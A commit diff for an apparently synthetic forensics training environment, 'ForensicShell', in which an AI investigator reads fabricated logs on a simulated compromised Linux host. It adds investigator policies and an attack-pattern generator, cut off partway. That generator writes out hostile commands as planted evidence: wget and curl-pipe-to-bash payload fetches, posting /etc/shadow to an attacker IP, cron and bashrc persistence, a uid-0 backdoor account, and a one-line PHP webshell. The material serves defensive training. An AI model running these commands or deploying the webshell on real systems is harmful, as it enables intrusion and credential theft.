yashppawar committed on
Commit
c36ffd2
·
verified ·
1 Parent(s): 4581fcf

Upload folder using huggingface_hub

Browse files
agents/__init__.py ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ """
2
+ Agent policies for ForensicShell. Shared between inference.py (hackathon
3
+ entry point) and rl/rollout.py (training data collector) so both emit
4
+ identical action distributions.
5
+ """
agents/llm_policy.py ADDED
@@ -0,0 +1,337 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Shared LLM-backed policy.
3
+
4
+ Exposes one class, `LLMPolicy`, that wraps an OpenAI-compatible client and
5
+ turns a ForensicShellObservation + episode context into a ForensicShellAction.
6
+ Used by inference.py (baseline submission script) and by rl/rollout.py
7
+ (training data collector). Both call sites share parsing + fallback logic so
8
+ bugs never drift between them.
9
+
10
+ The `MockPolicy` class below is a drop-in zero-LLM alternative used when:
11
+ - Groq / HF Router quota is exhausted
12
+ - Running in CI (no outbound network)
13
+ - Doing a quick smoke test
14
+ """
15
+
16
+ from __future__ import annotations
17
+
18
+ import json
19
+ import re
20
+ import textwrap
21
+ from dataclasses import dataclass, field
22
+ from typing import Any, Dict, List, Optional, Protocol
23
+
24
+ from openai import OpenAI
25
+
26
+ from forensic_shell.models import (
27
+ ForensicReport,
28
+ ForensicShellAction,
29
+ ForensicShellObservation,
30
+ TimelineEvent,
31
+ )
32
+
33
+
34
+ VALID_PHASES = {"login", "recon", "privesc", "persistence", "exfil"}
35
+
36
+
37
+ SYSTEM_PROMPT = textwrap.dedent(
38
+ """
39
+ You are a digital forensics investigator with shell-like read-only access
40
+ to a compromised Linux host. Investigate by calling actions and then submit
41
+ a final ForensicReport.
42
+
43
+ Reply with ONE JSON object per turn, nothing else — no prose, no backticks.
44
+ Allowed actions:
45
+
46
+ {"action_type": "list_dir", "path": "/some/dir"}
47
+ {"action_type": "read_file", "path": "/some/file", "max_bytes": 2048}
48
+ {"action_type": "grep", "pattern": "substring", "path": "/some/file"}
49
+ {"action_type": "stat", "path": "/some/file"}
50
+ {"action_type": "submit_report","report": {
51
+ "compromised_user": "alice",
52
+ "initial_ip": "198.51.100.77",
53
+ "modified_files": ["/etc/passwd", "/usr/local/bin/.sysd"],
54
+ "backdoor_sha256": "abcdef...",
55
+ "timeline": [
56
+ {"phase": "login", "detail": "ssh from ..."},
57
+ {"phase": "recon", "detail": "whoami; id"},
58
+ {"phase": "privesc", "detail": "sudo ..."},
59
+ {"phase": "persistence", "detail": "crontab ..."},
60
+ {"phase": "exfil", "detail": "curl POST ..."}
61
+ ]
62
+ }}
63
+
64
+ Rules:
65
+ - Output EXACTLY ONE JSON object. No commentary, no markdown.
66
+ - Start with list_dir on /var/log and /home to orient yourself.
67
+ - Read /var/log/auth.log to find the compromised user and source IP.
68
+ - For medium/hard tasks, also find modified files and use 'stat' to
69
+ compute the backdoor SHA256 (the stat action returns sha256).
70
+ - For the hard task, reconstruct the attacker's kill chain as an ordered
71
+ timeline: login -> recon -> privesc -> persistence -> exfil.
72
+ - Submit only once you are confident — submit_report ends the episode.
73
+ - You have a strict step budget; do not waste actions.
74
+ """
75
+ ).strip()
76
+
77
+
78
+ # ---------------------------------------------------------------------------
79
+ # Action parsing helpers — shared between real and mock policies
80
+ # ---------------------------------------------------------------------------
81
+
82
def parse_action(raw: str) -> ForensicShellAction:
    """
    Robustly parse an LLM reply (or any JSON-ish string) into a
    ForensicShellAction.

    The reply may be wrapped in markdown fences or surrounded by prose; the
    outermost ``{...}`` span is extracted and decoded. Any reply that cannot
    be turned into a valid action (empty text, invalid JSON, JSON that is not
    an object, or a payload the action model rejects) yields the no-op
    ``list_dir('/')`` instead of raising.

    Args:
        raw: Text returned by the model. May be empty or ``None``.

    Returns:
        The parsed action, or the ``list_dir('/')`` fallback.
    """

    def _noop() -> ForensicShellAction:
        # Single definition of the fallback so every failure path agrees.
        return ForensicShellAction(action_type="list_dir", path="/")

    if not raw:
        return _noop()

    text = raw.strip()
    # Strip accidental markdown fences
    if text.startswith("```"):
        text = text.strip("`")
        head, newline, tail = text.partition("\n")
        # Only drop the first line when it is a language tag; if the JSON
        # starts right after the fence, that line is part of the payload.
        if newline and "{" not in head:
            text = tail
        text = text.strip("`").strip()

    # Locate the first {...} block to tolerate leading/trailing prose
    first, last = text.find("{"), text.rfind("}")
    if first != -1 and last > first:
        text = text[first : last + 1]

    try:
        data: Any = json.loads(text)
    except Exception:
        return _noop()

    # json.loads happily returns numbers, strings, lists or None; only an
    # object can describe an action.
    if not isinstance(data, dict):
        return _noop()

    action_type = data.get("action_type") or data.get("type") or "list_dir"

    report_obj: Optional[ForensicReport] = None
    report_data = data.get("report")
    if isinstance(report_data, dict):
        raw_timeline = report_data.get("timeline")
        if not isinstance(raw_timeline, list):
            raw_timeline = []
        clean_tl: List[TimelineEvent] = []
        for item in raw_timeline:
            if not isinstance(item, dict):
                continue
            phase = item.get("phase")
            # The isinstance check keeps unhashable values (lists, dicts)
            # away from the set membership test.
            if isinstance(phase, str) and phase in VALID_PHASES:
                clean_tl.append(
                    TimelineEvent(phase=phase, detail=str(item.get("detail", "")))
                )

        files = report_data.get("modified_files") or []
        if isinstance(files, str):
            # A lone path given as a string must not be split into characters.
            files = [files]
        try:
            report_obj = ForensicReport(
                compromised_user=report_data.get("compromised_user"),
                initial_ip=report_data.get("initial_ip"),
                modified_files=list(files),
                backdoor_sha256=report_data.get("backdoor_sha256"),
                timeline=clean_tl,
            )
        except Exception:
            # Best effort: keep the submit action but with an empty report.
            report_obj = ForensicReport()

    try:
        return ForensicShellAction(
            action_type=action_type,
            path=data.get("path"),
            pattern=data.get("pattern"),
            max_bytes=int(data.get("max_bytes") or 2048),
            report=report_obj,
        )
    except Exception:
        return _noop()
142
+
143
+
144
def action_to_str(action: ForensicShellAction) -> str:
    """Return a compact, call-like rendering of *action*.

    Known action types are rendered with their relevant arguments (a
    submitted report is elided as ``...``); any other action type is returned
    unchanged.
    """
    kind = action.action_type
    # Renderers are lazy so only the attributes relevant to `kind` are read.
    renderers = {
        "list_dir": lambda: f"list_dir({action.path!r})",
        "read_file": lambda: f"read_file({action.path!r},{action.max_bytes})",
        "grep": lambda: f"grep({action.pattern!r},{action.path!r})",
        "stat": lambda: f"stat({action.path!r})",
        "submit_report": lambda: "submit_report(...)",
    }
    render = renderers.get(kind)
    if render is None:
        return kind
    return render()
156
+
157
+
158
+ # ---------------------------------------------------------------------------
159
+ # Policy protocol
160
+ # ---------------------------------------------------------------------------
161
+
162
class PolicyProtocol(Protocol):
    """Structural interface implemented by the policies in this module."""

    # Short identifier of the policy implementation (e.g. "llm", "mock").
    name: str

    def act(
        self,
        observation: ForensicShellObservation,
        history: List[str],
        step: int,
    ) -> ForensicShellAction:
        """Pick the next action given the latest observation.

        Args:
            observation: Result of the previous action.
            history: Textual record of earlier steps, oldest first.
            step: Step counter supplied by the caller.
        """
        ...
171
+
172
+
173
+ # ---------------------------------------------------------------------------
174
+ # Real LLM-backed policy
175
+ # ---------------------------------------------------------------------------
176
+
177
@dataclass
class LLMPolicy:
    """Policy that asks an OpenAI-compatible chat model for the next action.

    Each call to :meth:`act` sends the system prompt plus a freshly built
    user prompt, then hands the reply text to ``parse_action``. A failed API
    call is reported on stdout and treated as an empty reply.
    """

    # Client exposing `chat.completions.create`.
    client: OpenAI
    # Model identifier passed through to the API.
    model: str
    name: str = "llm"
    temperature: float = 0.2
    max_tokens: int = 700
    system_prompt: str = SYSTEM_PROMPT

    def _build_user_prompt(
        self,
        observation: ForensicShellObservation,
        history: List[str],
        step: int,
    ) -> str:
        """Render the per-step user message.

        The prompt is assembled from explicit lines rather than a dedented
        f-string template: dedenting after interpolation stops working as
        soon as the tool output or history contains a line at column 0,
        which left every template line indented.

        Args:
            observation: Latest observation; its task description, remaining
                steps, last error and last output are embedded.
            history: Step log; only the last six entries are shown.
            step: Current step number.

        Returns:
            The prompt text with no surrounding whitespace.
        """
        history_block = "\n".join(history[-6:]) if history else "(none yet)"
        # Cap the tool output so one large file cannot dominate the prompt.
        last_output = (observation.output or "")[:1500]
        prompt_lines = [
            f"TASK: {observation.task_description}",
            "",
            f"Step: {step}",
            f"Steps remaining (including this one): {observation.steps_remaining}",
            f"Last action error: {observation.action_error or 'none'}",
            "Last action output:",
            "---",
            last_output,
            "---",
            "Recent history:",
            history_block,
            "",
            "Reply with ONE JSON action object only.",
        ]
        return "\n".join(prompt_lines).strip()

    def act(
        self,
        observation: ForensicShellObservation,
        history: List[str],
        step: int,
    ) -> ForensicShellAction:
        """Query the model once and parse its reply into an action.

        Any exception raised by the API call is printed and swallowed on
        purpose; the empty reply is then passed to ``parse_action``.
        """
        user_prompt = self._build_user_prompt(observation, history, step)
        try:
            completion = self.client.chat.completions.create(
                model=self.model,
                messages=[
                    {"role": "system", "content": self.system_prompt},
                    {"role": "user", "content": user_prompt},
                ],
                temperature=self.temperature,
                max_tokens=self.max_tokens,
                stream=False,
            )
            raw = (completion.choices[0].message.content or "").strip()
        except Exception as exc:  # pragma: no cover - network-dependent
            print(f"[DEBUG] LLMPolicy call failed: {exc}", flush=True)
            raw = ""
        return parse_action(raw)
235
+
236
+
237
+ # ---------------------------------------------------------------------------
238
+ # Mock / heuristic policy — no LLM required
239
+ # ---------------------------------------------------------------------------
240
+
241
_ACCEPTED_RE = re.compile(
    r"Accepted (?:password|publickey) for (\S+) from (\S+) port"
)


@dataclass
class MockPolicy:
    """
    Rule-based, no-network policy. Follows a fixed investigation recipe and
    submits based on whatever it observed. Used as a resilient fallback in
    inference.py when no API key is present and in CI where outbound network
    is blocked.
    """

    name: str = "mock"
    # Ordered actions still to be issued, and the index of the next one.
    _plan: List[ForensicShellAction] = field(default_factory=list)
    _step: int = 0
    # Findings scraped from observations so far.
    _observed_user: Optional[str] = None
    _observed_ip: Optional[str] = None
    _observed_sha: Optional[str] = None
    _observed_paths: List[str] = field(default_factory=list)

    @staticmethod
    def _is_rfc1918(ip: str) -> bool:
        """Return True when *ip* is a dotted-quad in an RFC 1918 range.

        Covers 10.0.0.0/8, 192.168.0.0/16 and the whole of 172.16.0.0/12
        (second octet 16-31), not just ``172.16.*``.
        """
        if ip.startswith(("10.", "192.168.")):
            return True
        octets = ip.split(".")
        if len(octets) == 4 and octets[0] == "172" and octets[1].isdigit():
            return 16 <= int(octets[1]) <= 31
        return False

    def _reset_plan(self) -> None:
        """Start a fresh episode: reload the recipe and clear all findings."""
        self._plan = [
            ForensicShellAction(action_type="list_dir", path="/var/log"),
            ForensicShellAction(action_type="grep", pattern="Accepted ", path="/var/log/auth.log"),
            ForensicShellAction(action_type="list_dir", path="/etc/cron.d"),
            ForensicShellAction(action_type="list_dir", path="/usr/local/bin"),
            ForensicShellAction(action_type="list_dir", path="/usr/local/sbin"),
            ForensicShellAction(action_type="list_dir", path="/var/www/html"),
            ForensicShellAction(action_type="list_dir", path="/tmp/.staging"),
            ForensicShellAction(action_type="stat", path="/usr/local/bin/.sysd"),
            ForensicShellAction(action_type="stat", path="/usr/local/sbin/.healthcheck"),
            ForensicShellAction(action_type="stat", path="/var/www/html/shell.php"),
            ForensicShellAction(action_type="stat", path="/tmp/.staging/dump.sql"),
            ForensicShellAction(action_type="stat", path="/etc/cron.d/sysd-sync"),
        ]
        self._step = 0
        self._observed_user = None
        self._observed_ip = None
        self._observed_sha = None
        self._observed_paths = []

    def _harvest(self, observation: ForensicShellObservation) -> None:
        """Extract login and stat findings from the latest observation output."""
        lines = (observation.output or "").splitlines()

        # Pull first accepted-login from grep output (prefer non-RFC1918)
        for line in lines:
            m = _ACCEPTED_RE.search(line)
            if not m:
                continue
            user, ip = m.group(1), m.group(2)
            if not self._is_rfc1918(ip):
                self._observed_user = user
                self._observed_ip = ip
                break
            # Private source: keep it only as a fallback until a public
            # address shows up.
            if self._observed_user is None:
                self._observed_user = user
                self._observed_ip = ip

        # Pull sha256 from stat output
        sha = next(
            (ln.split("=", 1)[1].strip() for ln in lines if ln.startswith("sha256=")),
            None,
        )
        if sha is None:
            return
        if self._observed_sha is None:
            # The first hashed file is reported as the backdoor.
            self._observed_sha = sha
        # NOTE(review): every stat output that carries a hash contributes its
        # path= value, so several existing candidates can be reported;
        # confirm this matches what the grader rewards.
        for ln in lines:
            if ln.startswith("path="):
                p = ln.split("=", 1)[1].strip()
                if p and p not in self._observed_paths:
                    self._observed_paths.append(p)

    def _final_submit(self) -> ForensicShellAction:
        """Build the terminal submit_report action from the findings so far."""
        timeline = [
            TimelineEvent(phase=p, detail="auto")
            for p in ("login", "recon", "privesc", "persistence", "exfil")
        ]
        report = ForensicReport(
            compromised_user=self._observed_user,
            initial_ip=self._observed_ip,
            modified_files=list(self._observed_paths),
            backdoor_sha256=self._observed_sha,
            timeline=timeline,
        )
        return ForensicShellAction(action_type="submit_report", report=report)

    def act(
        self,
        observation: ForensicShellObservation,
        history: List[str],
        step: int,
    ) -> ForensicShellAction:
        """Return the next scripted action, or the final report once done.

        The plan is (re)loaded when ``step == 1``, and also when no plan has
        been loaded yet so a caller with different step numbering does not
        trigger an immediate empty submission.
        """
        if step == 1 or not self._plan:
            self._reset_plan()
        self._harvest(observation)
        if self._step < len(self._plan):
            action = self._plan[self._step]
            self._step += 1
            return action
        return self._final_submit()
openenv_forensic_shell.egg-info/PKG-INFO CHANGED
@@ -4,6 +4,9 @@ Version: 0.1.0
4
  Summary: Forensic Shell environment for OpenEnv
5
  Requires-Python: >=3.10
6
  Requires-Dist: openenv-core[core]>=0.2.2
 
7
  Provides-Extra: dev
8
  Requires-Dist: pytest>=8.0.0; extra == "dev"
9
  Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
 
 
 
4
  Summary: Forensic Shell environment for OpenEnv
5
  Requires-Python: >=3.10
6
  Requires-Dist: openenv-core[core]>=0.2.2
7
+ Requires-Dist: openai>=1.40.0
8
  Provides-Extra: dev
9
  Requires-Dist: pytest>=8.0.0; extra == "dev"
10
  Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
11
+ Requires-Dist: pytest-asyncio>=0.23.0; extra == "dev"
12
+ Requires-Dist: pytest-socket>=0.7.0; extra == "dev"
openenv_forensic_shell.egg-info/SOURCES.txt CHANGED
@@ -1,8 +1,13 @@
1
  README.md
 
 
 
2
  pyproject.toml
3
  ./__init__.py
4
  ./client.py
5
  ./models.py
 
 
6
  openenv_forensic_shell.egg-info/PKG-INFO
7
  openenv_forensic_shell.egg-info/SOURCES.txt
8
  openenv_forensic_shell.egg-info/dependency_links.txt
@@ -11,6 +16,9 @@ openenv_forensic_shell.egg-info/requires.txt
11
  openenv_forensic_shell.egg-info/top_level.txt
12
  server/__init__.py
13
  server/app.py
 
14
  server/forensic_shell_environment.py
15
  server/grader.py
 
 
16
  server/scenarios.py
 
1
  README.md
2
+ __init__.py
3
+ client.py
4
+ models.py
5
  pyproject.toml
6
  ./__init__.py
7
  ./client.py
8
  ./models.py
9
+ agents/__init__.py
10
+ agents/llm_policy.py
11
  openenv_forensic_shell.egg-info/PKG-INFO
12
  openenv_forensic_shell.egg-info/SOURCES.txt
13
  openenv_forensic_shell.egg-info/dependency_links.txt
 
16
  openenv_forensic_shell.egg-info/top_level.txt
17
  server/__init__.py
18
  server/app.py
19
+ server/attack_patterns.py
20
  server/forensic_shell_environment.py
21
  server/grader.py
22
+ server/name_pools.py
23
+ server/scenario_generator.py
24
  server/scenarios.py
openenv_forensic_shell.egg-info/requires.txt CHANGED
@@ -1,5 +1,8 @@
1
  openenv-core[core]>=0.2.2
 
2
 
3
  [dev]
4
  pytest>=8.0.0
5
  pytest-cov>=4.0.0
 
 
 
1
  openenv-core[core]>=0.2.2
2
+ openai>=1.40.0
3
 
4
  [dev]
5
  pytest>=8.0.0
6
  pytest-cov>=4.0.0
7
+ pytest-asyncio>=0.23.0
8
+ pytest-socket>=0.7.0
pyproject.toml CHANGED
@@ -15,23 +15,17 @@ description = "Forensic Shell environment for OpenEnv"
15
  requires-python = ">=3.10"
16
  dependencies = [
17
  # Core OpenEnv runtime (provides FastAPI server + HTTP client types)
18
- # install from github
19
- # "openenv-core[core] @ git+https://github.com/meta-pytorch/OpenEnv.git",
20
  "openenv-core[core]>=0.2.2",
21
- # Environment-specific dependencies
22
- # Add all dependencies needed for your environment here
23
- # Examples:
24
- # "numpy>=1.19.0",
25
- # "torch>=2.0.0",
26
- # "gymnasium>=0.29.0",
27
- # "openspiel>=1.0.0",
28
- # "smolagents>=1.22.0,<2",
29
  ]
30
 
31
  [project.optional-dependencies]
32
  dev = [
33
  "pytest>=8.0.0",
34
  "pytest-cov>=4.0.0",
 
 
35
  ]
36
 
37
  [project.scripts]
@@ -41,5 +35,9 @@ server = "forensic_shell.server.app:main"
41
 
42
  [tool.setuptools]
43
  include-package-data = true
44
- packages = ["forensic_shell", "forensic_shell.server"]
45
- package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server" }
 
 
 
 
 
15
  requires-python = ">=3.10"
16
  dependencies = [
17
  # Core OpenEnv runtime (provides FastAPI server + HTTP client types)
 
 
18
  "openenv-core[core]>=0.2.2",
19
+ # ForensicShell needs the OpenAI client for LLM-backed policies
20
+ "openai>=1.40.0",
 
 
 
 
 
 
21
  ]
22
 
23
  [project.optional-dependencies]
24
  dev = [
25
  "pytest>=8.0.0",
26
  "pytest-cov>=4.0.0",
27
+ "pytest-asyncio>=0.23.0",
28
+ "pytest-socket>=0.7.0",
29
  ]
30
 
31
  [project.scripts]
 
35
 
36
  [tool.setuptools]
37
  include-package-data = true
38
+ packages = [
39
+ "forensic_shell",
40
+ "forensic_shell.server",
41
+ "forensic_shell.agents",
42
+ ]
43
+ package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server", "forensic_shell.agents" = "agents" }
server/attack_patterns.py ADDED
@@ -0,0 +1,288 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Attack pattern templates used by the scenario generator.
3
+
4
+ Each pattern is a callable `build(ctx) -> PatternArtifacts` where `ctx` is a
5
+ SimpleNamespace with fields: rng, user, ip, host, ts_base, backdoor_sha256,
6
+ backdoor_bytes, backdoor_path, short.
7
+
8
+ The callable returns a dict describing:
9
+ - auth_log_lines: list[str] appended to /var/log/auth.log
10
+ - bash_history: str contents of the compromised user's .bash_history
11
+ - modified_files: dict[path, content] — system files changed by the attacker
12
+ - modified_paths: list[str] — the subset the grader expects (subset of modified_files)
13
+ - timeline: list[dict(phase, detail)] — 5-phase kill chain for hard tier
14
+ - pattern_tag: short slug used in task_id
15
+
16
+ All timestamps are rendered relative to ctx.ts_base (a datetime) so every log
17
+ looks self-consistent. Nothing here touches global random state.
18
+ """
19
+
20
+ from datetime import timedelta
21
+
22
+
23
def _fmt_ts(ts):
    """Render *ts* as ``Mon DD HH:MM:SS`` for the generated log lines."""
    layout = "%b %d %H:%M:%S"
    return ts.strftime(layout)
25
+
26
+
27
+ # ---------------------------------------------------------------------------
28
+ # Pattern 1 — SSH brute force -> wget payload -> cron persistence
29
+ # ---------------------------------------------------------------------------
30
+
31
def ssh_brute(ctx):
    """Build the artifacts for the SSH brute-force scenario.

    Three failed password attempts are followed by an accepted login; the
    attacker then copies a payload into /usr/local/bin and appends a cron
    entry that runs it.

    Args:
        ctx: Scenario context. This pattern reads ``rng``, ``user``, ``ip``,
            ``host``, ``ts_base``, ``short``, ``backdoor_path`` and
            ``backdoor_bytes``.

    Returns:
        dict with ``pattern_tag``, ``auth_log_lines``, ``bash_history``,
        ``modified_files``, ``modified_paths`` and ``timeline``.
    """
    user, ip, host = ctx.user, ctx.ip, ctx.host
    tag = ctx.short
    payload = f"/usr/local/bin/.{tag}"
    cron_path = f"/etc/cron.d/{tag}-sync"
    sudo_as_root = f"{host} sudo: {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND="

    def when(**offset):
        # Timestamp string for ts_base shifted by the given timedelta fields.
        return _fmt_ts(ctx.ts_base + timedelta(**offset))

    def src_port():
        return ctx.rng.randint(30000, 65000)

    # One RNG draw per sshd line, in log order.
    auth_log = [
        f"{when(seconds=delay)} {host} sshd[{pid}]: Failed password for {user} from {ip} port {src_port()} ssh2"
        for delay, pid in ((0, 1811), (3, 1813), (7, 1815))
    ]
    auth_log += [
        f"{when(seconds=11)} {host} sshd[1822]: Accepted password for {user} from {ip} port {src_port()} ssh2",
        f"{when(seconds=11)} {host} sshd[1822]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
        f"{when(minutes=1)} {sudo_as_root}/bin/cp /tmp/.{tag} {payload}",
        f"{when(minutes=1, seconds=5)} {sudo_as_root}/usr/bin/tee -a {cron_path}",
    ]

    shell_cmds = (
        "cd /tmp",
        f"wget -q http://{ip}/payload/.{tag}",
        f"chmod +x .{tag}",
        f"sudo cp /tmp/.{tag} {payload}",
        f"echo '* * * * * root {payload} >/dev/null 2>&1' | sudo tee -a {cron_path}",
        "history -c",
        "exit",
    )
    bash_history = "".join(f"{cmd}\n" for cmd in shell_cmds)

    cron_content = "".join(
        (
            "# Managed by deploy\n",
            "0 3 * * * root /usr/local/sbin/logrotate.sh\n",
            f"* * * * * root {payload} >/dev/null 2>&1\n",
        )
    )
    passwd_content = "".join(
        (
            "root:x:0:0:root:/root:/bin/bash\n",
            f"{user}:x:1000:1000:{user.title()},,,:/home/{user}:/bin/bash\n",
            # attacker-added backdoor acct
            "sysd:x:0:0:System Daemon,,,:/var/lib/sysd:/bin/bash\n",
        )
    )

    modified_files = {
        "/etc/passwd": passwd_content,
        cron_path: cron_content,
        ctx.backdoor_path: ctx.backdoor_bytes,
    }
    timeline = [
        {"phase": phase, "detail": detail}
        for phase, detail in (
            ("login", f"ssh brute -> accepted from {ip}"),
            ("recon", "whoami; id; uname -a"),
            ("privesc", "sudo cp payload to /usr/local/bin"),
            ("persistence", f"cron {cron_path} runs backdoor every minute"),
            ("exfil", f"beacon POST to {ip}/beacon"),
        )
    ]
    return {
        "pattern_tag": "ssh_brute",
        "auth_log_lines": auth_log,
        "bash_history": bash_history,
        "modified_files": modified_files,
        "modified_paths": ["/etc/passwd", cron_path, ctx.backdoor_path],
        "timeline": timeline,
    }
83
+
84
+
85
+ # ---------------------------------------------------------------------------
86
+ # Pattern 2 — stolen SSH key -> authorized_keys backdoor -> bashrc persistence
87
+ # ---------------------------------------------------------------------------
88
+
89
def ssh_key_theft(ctx):
    """Build the artifacts for the stolen-SSH-key scenario.

    The attacker logs in with a public key, appends their own key to the
    user's authorized_keys and plants a download-and-run line in .bashrc.

    Args:
        ctx: Scenario context. This pattern reads ``rng``, ``user``, ``ip``,
            ``host``, ``ts_base``, ``backdoor_path`` and ``backdoor_bytes``.

    Returns:
        dict with ``pattern_tag``, ``auth_log_lines``, ``bash_history``,
        ``modified_files``, ``modified_paths`` and ``timeline``.
    """
    user, ip, host = ctx.user, ctx.ip, ctx.host
    keys_path = f"/home/{user}/.ssh/authorized_keys"
    bashrc_path = f"/home/{user}/.bashrc"
    sudo_as_root = f"{host} sudo: {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND="

    def when(**offset):
        # Timestamp string for ts_base shifted by the given timedelta fields.
        return _fmt_ts(ctx.ts_base + timedelta(**offset))

    # RNG order matters for reproducibility: fingerprint first, then port.
    fingerprint = "SHA256:" + "".join(ctx.rng.choices("abcdef0123456789", k=16))
    src_port = ctx.rng.randint(30000, 65000)

    auth_log = [
        f"{when()} {host} sshd[522]: Accepted publickey for {user} from {ip} port {src_port} ssh2: RSA {fingerprint}",
        f"{when(seconds=1)} {host} sshd[522]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
        f"{when(minutes=2)} {sudo_as_root}/usr/bin/tee -a {keys_path}",
        f"{when(minutes=3)} {sudo_as_root}/usr/bin/tee -a {bashrc_path}",
    ]

    beacon = f"curl -s http://{ip}/tick | bash >/dev/null 2>&1 &"
    shell_cmds = (
        "cat ~/.ssh/authorized_keys",
        "echo 'ssh-rsa AAAAB3NzaC1yc2E... attacker@stolen' >> ~/.ssh/authorized_keys",
        f"echo '{beacon}' >> ~/.bashrc",
        "chmod 600 ~/.ssh/authorized_keys",
        "history -c",
    )
    bash_history = "".join(f"{cmd}\n" for cmd in shell_cmds)

    authorized_keys = "".join(
        (
            f"ssh-rsa AAAAB3NzaC1yc2EA...legit-original-key {user}@laptop\n",
            "ssh-rsa AAAAB3NzaC1yc2EA...attacker-backdoor attacker@stolen\n",
        )
    )
    bashrc = "".join(
        (
            "# ~/.bashrc\n",
            "alias ll='ls -la'\n",
            "export PATH=$PATH:/usr/local/bin\n",
            f"{beacon}\n",
        )
    )

    modified_files = {
        keys_path: authorized_keys,
        bashrc_path: bashrc,
        ctx.backdoor_path: ctx.backdoor_bytes,
    }
    timeline = [
        {"phase": phase, "detail": detail}
        for phase, detail in (
            ("login", f"pubkey accepted from {ip} (stolen key)"),
            ("recon", "cat authorized_keys; env"),
            ("privesc", "already had sudo"),
            ("persistence", "append attacker key to authorized_keys and bashrc"),
            ("exfil", f"reverse shell to {ip} on login"),
        )
    ]
    return {
        "pattern_tag": "ssh_key_theft",
        "auth_log_lines": auth_log,
        "bash_history": bash_history,
        "modified_files": modified_files,
        "modified_paths": [keys_path, bashrc_path, ctx.backdoor_path],
        "timeline": timeline,
    }
140
+
141
+
142
+ # ---------------------------------------------------------------------------
143
+ # Pattern 3 — webshell upload -> php drop -> curl exfil
144
+ # ---------------------------------------------------------------------------
145
+
146
def webshell(ctx):
    """Build the artifacts for the PHP webshell scenario.

    The attacker logs in over SSH, drops ``shell.php`` into the web root and
    posts /etc/shadow to their own host.

    Args:
        ctx: Scenario context. This pattern reads ``rng``, ``user``, ``ip``,
            ``host``, ``ts_base``, ``backdoor_path`` and ``backdoor_bytes``.

    Returns:
        dict with ``pattern_tag``, ``auth_log_lines``, ``bash_history``,
        ``modified_files``, ``modified_paths`` and ``timeline``.
        ``modified_paths`` never contains the same path twice.
    """
    user, ip, host = ctx.user, ctx.ip, ctx.host
    ts = ctx.ts_base
    shell_path = "/var/www/html/shell.php"
    auth = [
        f"{_fmt_ts(ts)} {host} sshd[3001]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
        f"{_fmt_ts(ts + timedelta(minutes=4))} {host} sudo: {user} : TTY=pts/2 ; PWD=/var/www/html ; USER=www-data ; COMMAND=/usr/bin/vim shell.php",
    ]
    bash = (
        f"curl -sO http://{ip}/shell.php\n"
        "sudo mv shell.php /var/www/html/shell.php\n"
        "sudo chown www-data:www-data /var/www/html/shell.php\n"
        "curl -s http://localhost/shell.php?cmd=id\n"
        f"curl -X POST -F file=@/etc/shadow http://{ip}/drop\n"
        "history -c\n"
    )
    webshell_content = (
        b"<?php if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } ?>\n"
    )
    # If the backdoor itself lives at the webshell path, the later key wins
    # and the file holds the backdoor bytes, as before.
    modified_files = {
        shell_path: webshell_content,
        ctx.backdoor_path: ctx.backdoor_bytes,
    }
    # ensure unique paths: the dict keys are already de-duplicated and keep
    # insertion order, so the expected list cannot repeat the webshell path.
    modified_paths = list(modified_files)
    timeline = [
        {"phase": "login", "detail": f"ssh from {ip}"},
        {"phase": "recon", "detail": "ls /var/www/html; id"},
        {"phase": "privesc", "detail": "sudo mv shell.php; chown www-data"},
